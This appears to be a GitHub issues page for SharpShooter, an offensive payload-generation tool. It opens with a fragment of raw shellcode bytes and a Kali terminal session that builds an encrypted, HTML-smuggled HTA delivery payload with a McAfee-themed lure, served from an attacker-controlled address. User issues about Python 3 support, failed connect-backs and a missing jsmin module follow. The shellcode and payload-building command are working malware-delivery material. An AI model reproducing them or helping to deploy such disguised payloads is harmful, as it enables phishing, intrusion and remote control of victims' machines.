0xba,0x58,0xa4,0x53,0xe5,0x00,0x00,0x00,0x00,0xff,0xd5,0x48,0x93,0x53,0x53,
0x48,0x89,0xe7,0x48,0x89,0xf1,0x48,0x89,0xda,0x49,0xc7,0xc0,0x00,0x20,0x00,
0x00,0x49,0x89,0xf9,0x49,0xba,0x12,0x96,0x89,0xe2,0x00,0x00,0x00,0x00,0xff,
0xd5,0x48,0x83,0xc4,0x20,0x85,0xc0,0x74,0xb2,0x66,0x8b,0x07,0x48,0x01,0xc3,
0x85,0xc0,0x75,0xd2,0x58,0xc3,0x58,0x6a,0x00,0x59,0x49,0xc7,0xc2,0xf0,0xb5,
0xa2,0x56,0xff,0xd5 };
root@kali:/SharpShooter/output# cd ..

root@kali:~/SharpShooter# python SharpShooter.py --dotnetver 2 --payload hta --output hta --rawscfile ./raw.txt --web http://192.168.8.10/htadoc.hta --smuggle --template mcafee --deliver web --refs mscorlib.dll,System.Windows.Forms.dll --namespace CL2018.SharpShooter --entrypoint Main

   _____ __                    _____ __                __           
  / ___// /_  ____ __________ / ___// /_  ____  ____  / /____  _____
  \__ \/ __ \/ __ `/ ___/ __ \__ \/ __ \/ __ \/ __ \/ __/ _ \/ ___/
 ___/ / / / / /_/ / /  / /_/ /__/ / / / / /_/ / /_/ / /_/  __/ /    
/____/_/ /_/\__,_/_/  / .___/____/_/ /_/\____/\____/\__/\___/_/     
                     /_/                                            

 Dominic Chell, @domchell, MDSec ActiveBreach, v1.0

[] Written delivery payload to output/hta.hta
[] File [./output/hta.hta] successfully loaded !
[] Encrypted input file with key [qzfcakkbfa]
[] File [./output/hta.html] successfully created !
root@kali:~/SharpShooter#

Request: Update for Python3

Would be cool if we could use Python3 instead of 2 for this. It doesn't even run for me with Python2 now.

Is this project still under development?

I've done a recent git clone and it appears to not be accepting anything other than the staged HTA payload and even still it does not appear to connect back to the attacking machine. the demo one liners result in a looping error in its selection.

Am I missing something or is the tool just not ready to be used.

installing error

when i installed it it said ImportError: No module named jsmin

how can i fix this

Error installing

when i start SharpShooter after installing requirements.txt i do python SharpShooter.py but it doesn't start i also tried to do chmod + x or 777 on SharpShooter.py but it always gives me this error: Traceback (most latest call last):
File "SharpShooter.py", line 20, in
from jsmin import jsmin
ImportError: no module called jsmin